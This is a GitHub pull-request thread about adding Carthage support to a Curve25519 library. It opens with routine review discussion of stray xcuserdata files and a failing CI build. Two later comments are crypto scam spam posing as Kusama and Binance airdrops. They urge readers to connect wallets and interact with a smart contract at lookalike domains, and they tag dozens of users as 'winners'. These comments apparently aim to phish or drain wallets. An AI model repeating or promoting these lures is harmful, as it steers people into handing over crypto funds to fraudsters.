### PR TITLE
Add shared framework for Carthage support.

### PR DESCRIPTION
**Pull request by elland**
This also renames the resulting framework to Curve25519, related to #6.

### CODE REVIEW

**Comment by FredericJacobs** [comment]
Hi Elland,

Thanks for that. I'm open to having support for Carthage.

Can you remove your `xcuserdata/elland.xcuserdatad` files from the commit?

**Comment by elland** [comment]
@FredericJacobs Certainly. Used to have that being inside `.gitignore` by default, I missed it this time.

**Comment by FredericJacobs** [comment]
You checked it in before adding it to .gitignore, it's still there. Also, not sure what's up with the CI build failing before.

**Comment by elland** [comment]
Git is playing tricks on me today. Will get on it asap.

**Comment by elland** [comment]
Turns out I forgot the remove the xcuserdata from the BuildTests project as well as the Curve25519 one. 👌

**Comment by FredericJacobs** [comment]
Figured out why the CI is failing? Maybe an update to .travis.yml is needed?

**Comment by codelou** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

Kusama Exchange

[N|Solid](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)

**Comment by Jehovani05** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[Claim Now](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @JackXuyi, @xajkep, @Toby1009, @KhanSado, @orosmatthew, @bq1028, @Capricornus2003, @asserty308, @yi-yunseok, @whundahl, @InertiaOoo, @mazharqayyum, @peeyush-tm, @andantonyan, @ugo96, @igrekus, @Fern1ck, @alexfromgl, @devilshyt, @jordiaixela, @fivetime, @vasilionjea, @Aspiringpentester, @auditum-mpa, @Alberto-MeloL, @Dao-Ke, @qitiandashengsunwukong, @jstetten, @jmpoep, @skyline75489, @sokai, @19Mahmoud19, @brendantay, @10kc-zack, @Azadnet3700, @Ngugi1, @SPARON, @adas754, @kkopec, @latifuluman, @p2yang, @JasonCarswell, @Twig6943, @Has333, @seanmamasde, @hak1ch, @mxmlmprn, @joetheace107, @mlinksva, @AnkitSuda

**Pull request closed without merging**
